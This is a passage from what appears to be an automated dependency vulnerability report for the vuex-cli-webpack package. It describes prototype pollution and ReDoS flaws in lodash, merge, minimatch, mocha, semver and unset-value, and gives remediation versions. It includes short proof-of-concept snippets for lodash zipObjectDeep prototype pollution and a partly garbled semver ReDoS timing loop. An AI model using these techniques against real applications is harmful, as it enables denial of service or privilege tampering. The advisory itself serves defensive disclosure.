For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade loader-utils to version 1.4.1, 2.0.3 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution through the zipObjectDeep function due to improper user input sanitization in the baseZipObject function.

PoC

lodash.zipobjectdeep:

const zipObjectDeep = require("lodash.zipobjectdeep");

let emptyObject = {};


console.log(`[+] Before prototype pollution : ${emptyObject.polluted}`);
//[+] Before prototype pollution : undefined

zipObjectDeep(["constructor.prototype.polluted"], [true]);
//we inject our malicious attributes in the vulnerable function

console.log(`[+] After prototype pollution : ${emptyObject.polluted}`);
//[+] After prototype pollution : true

lodash:

const test = require("lodash");

let emptyObject = {};


console.log(`[+] Before prototype pollution : ${emptyObject.polluted}`);
//[+] Before prototype pollution : undefined

test.zipObjectDeep(["constructor.prototype.polluted"], [true]);
//we inject our malicious attributes in the vulnerable function

console.log(`[+] After prototype pollution : ${emptyObject.polluted}`);
//[+] After prototype pollution : true

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.17 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: merge
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 sane@1.7.0 exec-sh@0.2.2 merge@1.2.1

Overview

merge is a library that allows you to merge multiple objects into one, optionally creating a new cloned object. Similar to the jQuery.extend but more flexible. Works in Node.js and the browser.

Affected versions of this package are vulnerable to Prototype Pollution. The 'merge' function already checks for 'proto' keys in an object to prevent prototype pollution, but does not check for 'constructor' or 'prototype' keys.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade merge to version 2.1.0 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 glob@3.2.11 minimatch@0.3.0

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via complicated and illegal regexes.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 3.0.2 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 glob@3.2.11 minimatch@0.3.0
    Remediation: Open PR to patch minimatch@0.3.0.

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS).

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 3.0.2 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: mocha
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3

Overview

mocha is a javascript test framework for node.js & the browser.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the clean function in utils.js.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mocha to version 10.1.0 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: mocha
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3

Overview

mocha is a javascript test framework for node.js & the browser.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). If the stack trace in utils.js begins with a large error message (>= 20k characters), and full-trace is not undisabled, utils.stackTraceFilter() will take exponential time to run.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mocha to version 6.0.0 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 traceur@0.0.105 semver@4.3.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-registry@0.4.4 semver@4.3.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 traceur@0.0.105 semver@4.3.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 traceur@0.0.105 semver@4.3.6

Overview

semver is a semantic version parser used by npm.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

PoC


const semver = require('semver')
const lengths_2 = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

console.log("n[+] Valid range - Test payloads")
for (let i = 0; i =1.2.3' + ' '.repeat(lengths_2[i]) + '<1.3.0';
const start = Date.now()
semver.validRange(value)
// semver.minVersion(value)
// semver.maxSatisfying(["1.2.3"], value)
// semver.minSatisfying(["1.2.3"], value)
// new semver.Range(value, {})

const end = Date.now();
console.log('length=%d, time=%d ms', value.length, end - start);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade semver to version 5.7.2, 6.3.1, 7.5.2 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: unset-value
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
